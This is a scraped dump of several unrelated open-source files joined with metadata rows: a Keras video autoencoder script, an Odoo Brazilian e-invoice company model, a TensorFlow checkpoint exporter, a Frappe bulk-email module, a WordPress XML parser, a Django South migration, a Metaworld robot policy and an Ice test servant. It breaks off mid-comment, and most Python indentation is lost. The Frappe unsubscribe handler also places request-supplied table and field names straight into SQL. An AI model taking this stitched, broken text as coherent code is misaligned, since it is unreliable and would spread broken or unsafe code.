if PRINT_MODEL_SUMMARY:
print (encoder.summary())
print (decoder.summary())
print (autoencoder.summary())
# exit(0)
# Save model to file
if SAVE_MODEL:
print ("Saving models to file...")
model_json = encoder.to_json()
with open(os.path.join(MODEL_DIR, "encoder.json"), "w") as json_file:
json_file.write(model_json)
model_json = decoder.to_json()
with open(os.path.join(MODEL_DIR, "decoder.json"), "w") as json_file:
json_file.write(model_json)
model_json = autoencoder.to_json()
with open(os.path.join(MODEL_DIR, "autoencoder.json"), "w") as json_file:
json_file.write(model_json)
if PLOT_MODEL:
plot_model(encoder, to_file=os.path.join(MODEL_DIR, 'encoder.png'), show_shapes=True)
plot_model(decoder, to_file=os.path.join(MODEL_DIR, 'decoder.png'), show_shapes=True)
plot_model(autoencoder, to_file=os.path.join(MODEL_DIR, 'autoencoder.png'), show_shapes=True)
if ENC_WEIGHTS != "None":
print ("Pre-loading encoder with weights...")
load_weights(ENC_WEIGHTS, encoder)
if DEC_WEIGHTS != "None":
print ("Pre-loading decoder with weights...")
load_weights(DEC_WEIGHTS, decoder)
def load_X(videos_list, index, data_dir):
X = np.zeros((BATCH_SIZE, VIDEO_LENGTH,) + IMG_SIZE)
for i in range(BATCH_SIZE):
for j in range(VIDEO_LENGTH):
filename = "frame_" + str(videos_list[(index*BATCH_SIZE + i), j]) + ".png"
im_file = os.path.join(data_dir, filename)
try:
frame = cv2.imread(im_file, cv2.IMREAD_COLOR)
X[i, j] = (frame.astype(np.float32) - 127.5) / 127.5
except AttributeError as e:
print (im_file)
print (e)
return X
def train(BATCH_SIZE, ENC_WEIGHTS, DEC_WEIGHTS):
print ("Loading data...")
mnist = np.load(os.path.join(DATA_DIR, 'mnist_test_seq.npy'))
mnist = np.expand_dims(mnist, axis=4)
# Build the Spatio-temporal Autoencoder
print ("Creating models...")
encoder = encoder_model()
decoder = decoder_model()
autoencoder = autoencoder_model(encoder, decoder)
run_utilities(encoder, decoder, autoencoder, ENC_WEIGHTS, DEC_WEIGHTS)
autoencoder.compile(loss='mean_squared_error', optimizer=OPTIM)
NB_ITERATIONS = int(mnist.shape[1]/BATCH_SIZE)
# Setup TensorBoard Callback
TC = tb_callback.TensorBoard(log_dir=TF_LOG_DIR, histogram_freq=0, write_graph=False, write_images=False)
# LRS = lrs_callback.LearningRateScheduler(schedule=schedule)
# LRS.set_model(autoencoder)
print ("Beginning Training...")
# Begin Training
for epoch in range(NB_EPOCHS):
print("\n\nEpoch ", epoch)
loss = []
# Set learning rate every epoch
# LRS.on_epoch_begin(epoch=epoch)
lr = K.get_value(autoencoder.optimizer.lr)
print ("Learning rate: " + str(lr))
for index in range(NB_ITERATIONS):
# Train Autoencoder
X_train = np.zeros(shape=(10, 10, 64, 64, 1))
y_train = np.zeros(shape=(10, 10, 64, 64, 1))
for i in range(BATCH_SIZE):
X_train[i] = mnist[0 : int(VIDEO_LENGTH/2), index+i]
                y_train[i] = mnist[int(VIDEO_LENGTH/2) : VIDEO_LENGTH, index+i]
X_train = (X_train.astype(np.float32) - 127.5) / 127.5
y_train = (y_train.astype(np.float32) - 127.5) / 127.5
loss.append(autoencoder.train_on_batch(X_train, y_train))
arrow = int(index / (NB_ITERATIONS / 40))
stdout.write("\rIteration: " + str(index) + "/" + str(NB_ITERATIONS-1) + " " +
"loss: " + str(loss[len(loss)-1]) +
"\t [" + "{0}>".format("="*(arrow)))
stdout.flush()
if SAVE_GENERATED_IMAGES:
# Save generated images to file
predicted_images = autoencoder.predict(X_train, verbose=0)
orig_image, truth_image, pred_image = combine_images(X_train, y_train, predicted_images)
pred_image = pred_image * 127.5 + 127.5
orig_image = orig_image * 127.5 + 127.5
truth_image = truth_image * 127.5 + 127.5
if epoch == 0 :
cv2.imwrite(os.path.join(GEN_IMAGES_DIR, str(epoch) + "_" + str(index) + "_orig.png"), orig_image)
cv2.imwrite(os.path.join(GEN_IMAGES_DIR, str(epoch) + "_" + str(index) + "_truth.png"), truth_image)
cv2.imwrite(os.path.join(GEN_IMAGES_DIR, str(epoch) + "_" + str(index) + ".png"), pred_image)
        # After each epoch, compute and log the average loss
avg_loss = sum(loss)/len(loss)
logs = {'loss': avg_loss}
TC.on_epoch_end(epoch, logs)
# Log the losses
with open(os.path.join(LOG_DIR, 'losses.json'), 'a') as log_file:
log_file.write("{\"epoch\":%d, \"d_loss\":%f};\n" % (epoch, avg_loss))
print("\nAvg loss: " + str(avg_loss))
# Save model weights per epoch to file
encoder.save_weights(os.path.join(CHECKPOINT_DIR, 'encoder_epoch_'+str(epoch)+'.h5'), True)
decoder.save_weights(os.path.join(CHECKPOINT_DIR, 'decoder_epoch_' + str(epoch) + '.h5'), True)
# End TensorBoard Callback
TC.on_train_end('_')
def test(ENC_WEIGHTS, DEC_WEIGHTS):
# Create models
print ("Creating models...")
encoder = encoder_model()
decoder = decoder_model()
autoencoder = autoencoder_model(encoder, decoder)
run_utilities(encoder, decoder, autoencoder, ENC_WEIGHTS, DEC_WEIGHTS)
autoencoder.compile(loss='mean_squared_error', optimizer=OPTIM)
# Build video progressions
frames_source = hkl.load(os.path.join(TEST_DATA_DIR, 'sources_test_128.hkl'))
videos_list = []
start_frame_index = 1
end_frame_index = VIDEO_LENGTH + 1
while (end_frame_index <= len(frames_source)):
frame_list = frames_source[start_frame_index:end_frame_index]
if (len(set(frame_list)) == 1):
videos_list.append(range(start_frame_index, end_frame_index))
start_frame_index = start_frame_index + VIDEO_LENGTH
end_frame_index = end_frame_index + VIDEO_LENGTH
else:
start_frame_index = end_frame_index - 1
end_frame_index = start_frame_index + VIDEO_LENGTH
videos_list = np.asarray(videos_list, dtype=np.int32)
n_videos = videos_list.shape[0]
# Test model by making predictions
loss = []
NB_ITERATIONS = int(n_videos / BATCH_SIZE)
for index in range(NB_ITERATIONS):
# Test Autoencoder
X = load_X(videos_list, index, TEST_DATA_DIR)
X_test = X[:, 0: int(VIDEO_LENGTH / 2)]
y_test = X[:, int(VIDEO_LENGTH / 2):]
loss.append(autoencoder.test_on_batch(X_test, y_test))
y_pred = autoencoder.predict_on_batch(X_test)
arrow = int(index / (NB_ITERATIONS / 40))
stdout.write("\rIteration: " + str(index) + "/" + str(NB_ITERATIONS - 1) + " " +
"loss: " + str(loss[len(loss) - 1]) +
"\t [" + "{0}>".format("=" * (arrow)))
stdout.flush()
orig_image, truth_image, pred_image = combine_images(X_test, y_test, y_pred)
pred_image = pred_image * 127.5 + 127.5
orig_image = orig_image * 127.5 + 127.5
truth_image = truth_image * 127.5 + 127.5
cv2.imwrite(os.path.join(TEST_RESULTS_DIR, str(index) + "_orig.png"), orig_image)
cv2.imwrite(os.path.join(TEST_RESULTS_DIR, str(index) + "_truth.png"), truth_image)
cv2.imwrite(os.path.join(TEST_RESULTS_DIR, str(index) + "_pred.png"), pred_image)
avg_loss = sum(loss) / len(loss)
print("\nAvg loss: " + str(avg_loss))
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument("--mode", type=str)
parser.add_argument("--enc_weights", type=str, default="None")
parser.add_argument("--dec_weights", type=str, default="None")
parser.add_argument("--batch_size", type=int, default=BATCH_SIZE)
parser.add_argument("--nice", dest="nice", action="store_true")
parser.set_defaults(nice=False)
args = parser.parse_args()
return args
if __name__ == "__main__":
args = get_args()
if args.mode == "train":
train(BATCH_SIZE=args.batch_size,
ENC_WEIGHTS=args.enc_weights,
DEC_WEIGHTS=args.dec_weights)
if args.mode == "test":
test(ENC_WEIGHTS=args.enc_weights,
DEC_WEIGHTS=args.dec_weights)
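# Example invocations (illustrative only; the script and weight-file names are
# hypothetical -- the flags themselves come from get_args() above):
#
#   python <this_script>.py --mode train --batch_size 10
#   python <this_script>.py --mode test \
#       --enc_weights checkpoints/encoder_epoch_9.h5 \
#       --dec_weights checkpoints/decoder_epoch_9.h5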
|
mit
| 2,274,764,787,847,387,000
| 36.227384
| 116
| 0.59711
| false
| 3.393136
| true
| false
| false
|
OCA/l10n-brazil
|
l10n_br_nfe/models/res_company.py
|
1
|
3081
|
# Copyright 2019 Akretion (Raphaël Valyi <raphael.valyi@akretion.com>)
# Copyright 2019 KMEE INFORMATICA LTDA
# License AGPL-3 - See http://www.gnu.org/licenses/agpl-3.0.html
from odoo import api, fields
from odoo.addons.spec_driven_model.models import spec_models
from ..constants.nfe import (
NFE_ENVIRONMENT_DEFAULT,
NFE_ENVIRONMENTS,
NFE_VERSION_DEFAULT,
NFE_VERSIONS,
)
PROCESSADOR_ERPBRASIL_EDOC = "oca"
PROCESSADOR = [(PROCESSADOR_ERPBRASIL_EDOC, "erpbrasil.edoc")]
class ResCompany(spec_models.SpecModel):
_name = "res.company"
_inherit = ["res.company", "nfe.40.emit"]
_nfe_search_keys = ["nfe40_CNPJ", "nfe40_xNome", "nfe40_xFant"]
def _compute_nfe_data(self):
# compute because a simple related field makes the match_record fail
for rec in self:
if rec.partner_id.is_company:
rec.nfe40_choice6 = "nfe40_CNPJ"
rec.nfe40_CNPJ = rec.partner_id.cnpj_cpf
else:
rec.nfe40_choice6 = "nfe40_CPF"
rec.nfe40_CPF = rec.partner_id.cnpj_cpf
nfe40_CNPJ = fields.Char(compute="_compute_nfe_data")
nfe40_xNome = fields.Char(related="partner_id.legal_name")
nfe40_xFant = fields.Char(related="partner_id.name")
nfe40_IE = fields.Char(related="partner_id.inscr_est")
nfe40_CRT = fields.Selection(related="tax_framework")
nfe40_enderEmit = fields.Many2one("res.partner", related="partner_id")
nfe40_choice6 = fields.Selection(string="CNPJ ou CPF?", compute="_compute_nfe_data")
processador_edoc = fields.Selection(
selection_add=PROCESSADOR,
)
nfe_version = fields.Selection(
selection=NFE_VERSIONS,
string="NFe Version",
default=NFE_VERSION_DEFAULT,
)
nfe_environment = fields.Selection(
selection=NFE_ENVIRONMENTS,
string="NFe Environment",
default=NFE_ENVIRONMENT_DEFAULT,
)
nfe_default_serie_id = fields.Many2one(
comodel_name="l10n_br_fiscal.document.serie",
string="NF-e Default Serie",
)
def _build_attr(self, node, fields, vals, path, attr):
if attr.get_name() == "enderEmit" and self.env.context.get("edoc_type") == "in":
            # we don't want to try to build a related partner_id for enderEmit
# when importing an NFe
# instead later the emit tag will be imported as the
# document partner_id (dest) and the enderEmit data will be
# injected in the same res.partner record.
return
return super()._build_attr(node, fields, vals, path, attr)
@api.model
def _prepare_import_dict(self, values, model=None):
# we disable enderEmit related creation with dry_run=True
context = self._context.copy()
context["dry_run"] = True
values = super(ResCompany, self.with_context(context))._prepare_import_dict(
values, model
)
if not values.get("name"):
values["name"] = values.get("nfe40_xNome") or values.get("nfe40_xFant")
return values
|
agpl-3.0
| -1,786,924,351,013,670,700
| 35.235294
| 88
| 0.63961
| false
| 3.198339
| false
| false
| false
|
google-research/language
|
language/boolq/utils/best_checkpoint_exporter.py
|
1
|
4132
|
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Exporter to save the best checkpoint."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tensorflow.compat.v1 as tf
class BestCheckpointExporter(tf.estimator.Exporter):
"""Exporter that saves the model's best checkpoint.
We use this over `tf.estimator.BestExporter` since we don't want to
rely on tensorflow's `SavedModel` exporter method.
"""
def __init__(self, compare_fn, name='best-checkpoint',
event_file_pattern='eval/*.tfevents.*'):
"""Construct the exporter.
Args:
compare_fn: Function that, given the dictionary of output
metrics of the previously best and current checkpoints,
returns whether to override the previously best checkpoint
with the current one.
name: Name of the exporter
event_file_pattern: where to look for events logs
Raises:
ValueError: if given incorrect arguments
"""
self._name = name
self._compare_fn = compare_fn
if self._compare_fn is None:
raise ValueError('`compare_fn` must not be None.')
self._event_file_pattern = event_file_pattern
self._model_dir = None
self._best_eval_result = None
@property
def name(self):
return self._name
def export(self, estimator, export_path, checkpoint_path,
eval_result, is_the_final_export):
del is_the_final_export
if self._model_dir != estimator.model_dir and self._event_file_pattern:
tf.logging.info('Loading best metric from event files.')
self._model_dir = estimator.model_dir
full_event_file_pattern = os.path.join(self._model_dir,
self._event_file_pattern)
self._best_eval_result = self._get_best_eval_result(
full_event_file_pattern)
if self._best_eval_result is None or self._compare_fn(
best_eval_result=self._best_eval_result,
current_eval_result=eval_result):
tf.logging.info('Performing best checkpoint export.')
self._best_eval_result = eval_result
if not tf.gfile.Exists(export_path):
tf.gfile.MakeDirs(export_path)
new_files = set()
for file_path in tf.gfile.Glob(checkpoint_path + '.*'):
basename = os.path.basename(file_path)
new_files.add(basename)
out_file = os.path.join(export_path, basename)
tf.gfile.Copy(file_path, out_file)
# Clean out any old files
for filename in tf.gfile.ListDirectory(export_path):
if filename not in new_files:
tf.gfile.Remove(os.path.join(export_path, filename))
def _get_best_eval_result(self, event_files):
"""Get the best eval result from event files.
Args:
event_files: Absolute pattern of event files.
Returns:
The best eval result.
"""
if not event_files:
return None
best_eval_result = None
for event_file in tf.gfile.Glob(os.path.join(event_files)):
for event in tf.train.summary_iterator(event_file):
if event.HasField('summary'):
event_eval_result = {}
for value in event.summary.value:
if value.HasField('simple_value'):
event_eval_result[value.tag] = value.simple_value
if event_eval_result:
if best_eval_result is None or self._compare_fn(
best_eval_result, event_eval_result):
best_eval_result = event_eval_result
return best_eval_result
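# Usage sketch (hedged): wiring the exporter into train_and_evaluate. The
# estimator, the input functions, and the 'accuracy' metric name below are
# assumptions for illustration, not part of this module.
def accuracy_improved(best_eval_result, current_eval_result):
  """compare_fn that keeps the checkpoint with the higher eval accuracy."""
  return current_eval_result['accuracy'] > best_eval_result['accuracy']
# exporter = BestCheckpointExporter(compare_fn=accuracy_improved)
# eval_spec = tf.estimator.EvalSpec(input_fn=eval_input_fn, exporters=[exporter])
# tf.estimator.train_and_evaluate(estimator, train_spec, eval_spec)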
|
apache-2.0
| -1,810,089,931,885,031,700
| 34.316239
| 76
| 0.659003
| false
| 3.957854
| false
| false
| false
|
cadencewatches/frappe
|
frappe/utils/email_lib/bulk.py
|
1
|
4862
|
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe
import HTMLParser
import urllib
from frappe import msgprint, throw, _
from frappe.utils.email_lib.smtp import SMTPServer
from frappe.utils.email_lib.email_body import get_email, get_formatted_html
from frappe.utils.email_lib.html2text import html2text
from frappe.utils import cint, get_url, nowdate
class BulkLimitCrossedError(frappe.ValidationError): pass
def send(recipients=None, sender=None, doctype='User', email_field='email',
subject='[No Subject]', message='[No Content]', ref_doctype=None, ref_docname=None,
add_unsubscribe_link=True):
def is_unsubscribed(rdata):
if not rdata:
return 1
return cint(rdata.unsubscribed)
def check_bulk_limit(new_mails):
		this_month = frappe.db.sql("""select count(*) from `tabBulk Email` where
			month(creation)=month(%s)""", nowdate())[0][0]
monthly_bulk_mail_limit = frappe.conf.get('monthly_bulk_mail_limit') or 500
		if this_month + new_mails > monthly_bulk_mail_limit:
throw(_("Bulk email limit {0} crossed").format(monthly_bulk_mail_limit),
BulkLimitCrossedError)
def update_message(formatted, doc, add_unsubscribe_link):
updated = formatted
if add_unsubscribe_link:
unsubscribe_link = """<div style="padding: 7px; border-top: 1px solid #aaa;
margin-top: 17px;">
<small><a href="%s/?%s">
Unsubscribe</a> from this list.</small></div>""" % (get_url(),
urllib.urlencode({
"cmd": "frappe.utils.email_lib.bulk.unsubscribe",
"email": doc.get(email_field),
"type": doctype,
"email_field": email_field
}))
updated = updated.replace("<!--unsubscribe link here-->", unsubscribe_link)
return updated
if not recipients: recipients = []
if not sender or sender == "Administrator":
sender = frappe.db.get_value('Outgoing Email Settings', None, 'auto_email_id')
check_bulk_limit(len(recipients))
formatted = get_formatted_html(subject, message)
for r in filter(None, list(set(recipients))):
rdata = frappe.db.sql("""select * from `tab%s` where %s=%s""" % (doctype,
email_field, '%s'), (r,), as_dict=1)
doc = rdata and rdata[0] or {}
if (not add_unsubscribe_link) or (not is_unsubscribed(doc)):
# add to queue
updated = update_message(formatted, doc, add_unsubscribe_link)
try:
text_content = html2text(updated)
except HTMLParser.HTMLParseError:
text_content = "[See html attachment]"
add(r, sender, subject, updated, text_content, ref_doctype, ref_docname)
def add(email, sender, subject, formatted, text_content=None,
ref_doctype=None, ref_docname=None):
"""add to bulk mail queue"""
e = frappe.new_doc('Bulk Email')
e.sender = sender
e.recipient = email
try:
e.message = get_email(email, sender=e.sender, formatted=formatted, subject=subject,
text_content=text_content).as_string()
except frappe.ValidationError:
# bad email id - don't add to queue
return
e.status = 'Not Sent'
e.ref_doctype = ref_doctype
e.ref_docname = ref_docname
e.save(ignore_permissions=True)
@frappe.whitelist(allow_guest=True)
def unsubscribe():
doctype = frappe.form_dict.get('type')
field = frappe.form_dict.get('email_field')
email = frappe.form_dict.get('email')
frappe.db.sql("""update `tab%s` set unsubscribed=1
where `%s`=%s""" % (doctype, field, '%s'), (email,))
if not frappe.form_dict.get("from_test"):
frappe.db.commit()
frappe.local.message_title = "Unsubscribe"
frappe.local.message = "<h3>Unsubscribed</h3><p>%s has been successfully unsubscribed.</p>" % email
frappe.response['type'] = 'page'
frappe.response['page_name'] = 'message.html'
def flush(from_test=False):
"""flush email queue, every time: called from scheduler"""
smtpserver = SMTPServer()
auto_commit = not from_test
if frappe.flags.mute_emails or frappe.conf.get("mute_emails") or False:
msgprint(_("Emails are muted"))
from_test = True
for i in xrange(500):
email = frappe.db.sql("""select * from `tabBulk Email` where
status='Not Sent' limit 1 for update""", as_dict=1)
if email:
email = email[0]
else:
break
frappe.db.sql("""update `tabBulk Email` set status='Sending' where name=%s""",
(email["name"],), auto_commit=auto_commit)
try:
if not from_test:
smtpserver.sess.sendmail(email["sender"], email["recipient"], email["message"])
frappe.db.sql("""update `tabBulk Email` set status='Sent' where name=%s""",
(email["name"],), auto_commit=auto_commit)
except Exception, e:
frappe.db.sql("""update `tabBulk Email` set status='Error', error=%s
where name=%s""", (unicode(e), email["name"]), auto_commit=auto_commit)
def clear_outbox():
"""remove mails older than 30 days in Outbox"""
frappe.db.sql("""delete from `tabBulk Email` where
datediff(now(), creation) > 30""")
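# Usage sketch -- the addresses, subject, and reference document below are
# hypothetical; send() queues the mail and flush() (normally run by the
# scheduler) delivers it:
#
# send(recipients=["jane@example.com"], sender="noreply@example.com",
# 	subject="Monthly digest", message="Hello<!--unsubscribe link here-->",
# 	ref_doctype="Newsletter", ref_docname="NL-00001")
# flush()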
|
mit
| -8,974,642,157,343,609,000
| 32.531034
| 100
| 0.693542
| false
| 3.159194
| false
| false
| false
|
hzmangel/wp2hugo
|
wp_parser.py
|
1
|
3688
|
from lxml import etree
class WordpressXMLParser:
def __init__(self, xml_file):
self.tree = etree.parse(xml_file)
self.ns = self.tree.getroot().nsmap
def get_meta(self):
return {
"title": str(self.tree.xpath("/rss/channel/title/text()")[0]),
"baseurl": str(self.tree.xpath("/rss/channel/link/text()")[0]),
"description": str(self.tree.xpath("/rss/channel/description/text()")[0]),
"language": str(self.tree.xpath("/rss/channel/language/text()")[0]),
"author": {
"name": str(self.tree.xpath("/rss/channel/wp:author/wp:author_display_name/text()", namespaces=self.ns)[0]),
"email": str(self.tree.xpath("/rss/channel/wp:author/wp:author_email/text()", namespaces=self.ns)[0]),
}
}
def get_categories(self):
categories = self.tree.xpath('/rss/channel/wp:category', namespaces=self.ns)
rslt = []
for r in categories:
rslt.append({
"term_id": str(r.xpath("wp:term_id/text()", namespaces=self.ns)[0]),
"nicename": str(r.xpath("wp:category_nicename/text()", namespaces=self.ns)[0]),
"name": str(r.xpath("wp:cat_name/text()", namespaces=self.ns)[0]),
})
return rslt
def get_tags(self):
tags = self.tree.xpath('/rss/channel/wp:tag', namespaces=self.ns)
rslt = []
for r in tags:
rslt.append({
"term_id": str(r.xpath("wp:term_id/text()", namespaces=self.ns)[0]),
"nicename": str(r.xpath("wp:tag_slug/text()", namespaces=self.ns)[0]),
"name": str(r.xpath("wp:tag_name/text()", namespaces=self.ns)[0]),
})
return rslt
def get_public_posts(self):
posts = self.tree.xpath("/rss/channel/item[wp:post_type='post' and wp:status!='draft']", namespaces=self.ns)
rslt = []
for r in posts:
rslt.append({
"title": str(r.xpath("title/text()")[0]),
"link": str(r.xpath("link/text()")[0]),
"creator": str(r.xpath("dc:creator/text()", namespaces=self.ns)[0]),
"content": str(r.xpath("content:encoded/text()", namespaces=self.ns)[0]),
"post_date": str(r.xpath("wp:post_date/text()", namespaces=self.ns)[0]),
"post_name": str(r.xpath("wp:post_name/text()", namespaces=self.ns)[0]),
"post_status": str(r.xpath("wp:status/text()", namespaces=self.ns)[0]),
"categories": [str(foo) for foo in r.xpath("category[@domain='category']/text()")],
"tags": [str(foo) for foo in r.xpath("category[@domain='post_tag']/text()")],
})
return rslt
def get_drafts(self):
drafts = self.tree.xpath("/rss/channel/item[wp:post_type='post' and wp:status='draft']", namespaces=self.ns)
rslt = []
for r in drafts:
rslt.append({
"title": str(r.xpath("title/text()")[0]),
"link": str(r.xpath("link/text()")[0]),
"creator": str(r.xpath("dc:creator/text()", namespaces=self.ns)[0]),
"content": str(r.xpath("content:encoded/text()", namespaces=self.ns)[0]),
"post_date": str(r.xpath("wp:post_date/text()", namespaces=self.ns)[0]),
"post_status": str(r.xpath("wp:status/text()", namespaces=self.ns)[0]),
"categories": [str(foo) for foo in r.xpath("category[@domain='category']/text()")],
"tags": [str(foo) for foo in r.xpath("category[@domain='post_tag']/text()")],
})
return rslt
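if __name__ == "__main__":
    # Quick demonstration; "wordpress.xml" is a placeholder for a real
    # WordPress export file in the working directory.
    wp = WordpressXMLParser("wordpress.xml")
    print(wp.get_meta()["title"])
    for post in wp.get_public_posts():
        print(post["post_date"], post["title"])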
|
mit
| 743,162,522,983,472,900
| 42.904762
| 124
| 0.532538
| false
| 3.472693
| false
| false
| false
|
jfunez/poliwall
|
poliwall/apps/polisessions/migrations/0002_auto__add_actioncategory__add_field_action_category.py
|
1
|
5819
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'ActionCategory'
db.create_table(u'polisessions_actioncategory', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=100)),
))
db.send_create_signal(u'polisessions', ['ActionCategory'])
# Adding field 'Action.category'
db.add_column(u'polisessions_action', 'category',
self.gf('django.db.models.fields.related.ForeignKey')(to=orm['polisessions.ActionCategory'], null=True, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting model 'ActionCategory'
db.delete_table(u'polisessions_actioncategory')
# Deleting field 'Action.category'
db.delete_column(u'polisessions_action', 'category_id')
models = {
u'polidata.house': {
'Meta': {'object_name': 'House'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_public': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'rol_name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'polidata.legislative': {
'Meta': {'object_name': 'Legislative'},
'code': ('django.db.models.fields.IntegerField', [], {}),
'end_date': ('django.db.models.fields.DateField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'roman_code': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'start_date': ('django.db.models.fields.DateField', [], {})
},
u'polidata.politician': {
'Meta': {'object_name': 'Politician'},
'biography': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'photo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'politician_id': ('django.db.models.fields.IntegerField', [], {'primary_key': 'True'}),
'profile_id': ('django.db.models.fields.CharField', [], {'max_length': '10', 'blank': 'True'}),
'profile_url': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'sex': ('django.db.models.fields.CharField', [], {'default': "'M'", 'max_length': '1', 'db_index': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'twitter_user': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'})
},
u'polisessions.action': {
'Meta': {'ordering': "['session']", 'object_name': 'Action'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['polisessions.ActionCategory']", 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'legislative': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'legislative_actions'", 'to': u"orm['polidata.Legislative']"}),
'politician': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'actions'", 'to': u"orm['polidata.Politician']"}),
'session': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['polisessions.Session']"}),
'source_url': ('django.db.models.fields.TextField', [], {}),
'text': ('django.db.models.fields.TextField', [], {})
},
u'polisessions.actioncategory': {
'Meta': {'object_name': 'ActionCategory'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'polisessions.session': {
'Meta': {'ordering': "['date', 'ordinal']", 'object_name': 'Session'},
'assists_text': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'date': ('django.db.models.fields.DateField', [], {}),
'house': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'session_houses'", 'to': u"orm['polidata.House']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'legislative': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'session_legislatives'", 'to': u"orm['polidata.Legislative']"}),
'number': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'ordinal': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'president': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'presidents'", 'null': 'True', 'to': u"orm['polidata.Politician']"}),
'short_name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'source_url': ('django.db.models.fields.TextField', [], {})
}
}
complete_apps = ['polisessions']
|
agpl-3.0
| 238,009,160,051,770,620
| 62.26087
| 180
| 0.558687
| false
| 3.56338
| false
| false
| false
|
rlworkgroup/metaworld
|
metaworld/policies/sawyer_sweep_into_v2_policy.py
|
1
|
1506
|
import numpy as np
from metaworld.policies.action import Action
from metaworld.policies.policy import Policy, assert_fully_parsed, move
class SawyerSweepIntoV2Policy(Policy):
@staticmethod
@assert_fully_parsed
def _parse_obs(obs):
return {
'hand_pos': obs[:3],
'unused_1': obs[3],
'cube_pos': obs[4:7],
'unused_2': obs[7:-3],
'goal_pos': obs[-3:],
}
def get_action(self, obs):
o_d = self._parse_obs(obs)
action = Action({
'delta_pos': np.arange(3),
'grab_effort': 3
})
action['delta_pos'] = move(o_d['hand_pos'], to_xyz=self._desired_pos(o_d), p=25.)
action['grab_effort'] = self._grab_effort(o_d)
return action.array
@staticmethod
def _desired_pos(o_d):
pos_curr = o_d['hand_pos']
pos_cube = o_d['cube_pos'] + np.array([-0.005, .0, .01])
pos_goal = o_d['goal_pos']
if np.linalg.norm(pos_curr[:2] - pos_cube[:2]) > 0.04:
return pos_cube + np.array([0., 0., 0.3])
elif abs(pos_curr[2] - pos_cube[2]) > 0.04:
return pos_cube
else:
return pos_goal
@staticmethod
def _grab_effort(o_d):
pos_curr = o_d['hand_pos']
pos_cube = o_d['cube_pos']
if np.linalg.norm(pos_curr[:2] - pos_cube[:2]) > 0.04 \
or abs(pos_curr[2] - pos_cube[2]) > 0.15:
return -1.
else:
return .7
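# Usage sketch: the policy is stateless, so a single observation vector is
# enough to query it. The zero observation below is a stand-in for a real
# sweep-into-v2 observation (only its layout, parsed in _parse_obs, matters).
#
# policy = SawyerSweepIntoV2Policy()
# obs = np.zeros(39)                    # hand | unused | cube | unused | goal
# delta_xyz_and_grab = policy.get_action(obs)  # 4-vector from get_action above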
|
mit
| 1,833,870,968,265,588,700
| 26.381818
| 89
| 0.508632
| false
| 3.118012
| false
| false
| false
|
grembo/ice
|
python/test/Ice/ami/TestI.py
|
1
|
3180
|
# **********************************************************************
#
# Copyright (c) 2003-2017 ZeroC, Inc. All rights reserved.
#
# This copy of Ice is licensed to you under the terms described in the
# ICE_LICENSE file included in this distribution.
#
# **********************************************************************
import Ice, Test, threading, time
class TestIntfI(Test.TestIntf):
def __init__(self):
self._cond = threading.Condition()
self._batchCount = 0
self._pending = None
self._shutdown = False
def op(self, current=None):
pass
def opWithResult(self, current=None):
return 15
def opWithUE(self, current=None):
raise Test.TestIntfException()
def opWithPayload(self, bytes, current=None):
pass
def opBatch(self, current=None):
with self._cond:
self._batchCount += 1
self._cond.notify()
def opBatchCount(self, current=None):
with self._cond:
return self._batchCount
def waitForBatch(self, count, current=None):
with self._cond:
while self._batchCount < count:
self._cond.wait(5)
result = count == self._batchCount
self._batchCount = 0
return result
def close(self, mode, current=None):
current.con.close(Ice.ConnectionClose.valueOf(mode.value))
def sleep(self, ms, current=None):
time.sleep(ms / 1000.0)
def startDispatch(self, current=None):
with self._cond:
if self._shutdown:
                # Ignore: this can occur with the forceful connection close test, where
